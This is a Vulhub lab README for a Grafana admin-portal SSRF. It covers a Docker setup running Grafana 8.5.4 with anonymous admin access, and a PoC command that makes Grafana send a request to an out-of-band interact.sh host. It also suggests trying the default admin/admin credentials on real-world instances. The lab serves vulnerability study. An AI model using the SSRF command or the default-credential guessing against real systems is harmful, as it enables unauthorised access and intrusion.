Files
vulhub/grafana/admin-ssrf
Aaron 63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
first commit
2025-09-06 16:08:15 +08:00
..
2025-09-06 16:08:15 +08:00
2025-09-06 16:08:15 +08:00
2025-09-06 16:08:15 +08:00
2025-09-06 16:08:15 +08:00
2025-09-06 16:08:15 +08:00
2025-09-06 16:08:15 +08:00

Grafana Admin Portal SSRF

中文版本(Chinese version)

Grafana is a multi-platform open source analytics and interactive visualization web application.

The admin user is able to make requests to an unintended location in all versions of Grafana.

References:

Vulnerable environment

Execute following command to start a Grafana 8.5.4:

docker compose up -d

Then you can see the portal page for Grafana without the authentication in http://your-ip:3000, because this server enabled the anonymous as admins by:

[auth.anonymous]
enabled = true
org_role = Admin

If Grafana ask you for user credentials in real world, can try default admin and admin.

Vulnerability Reproduce

Use this POC to reproduce the SSRF:

python grafana-ssrf.py -H http://your-ip:3000 -u http://example.interact.sh/attack

As you can see, I got the request from Grafana: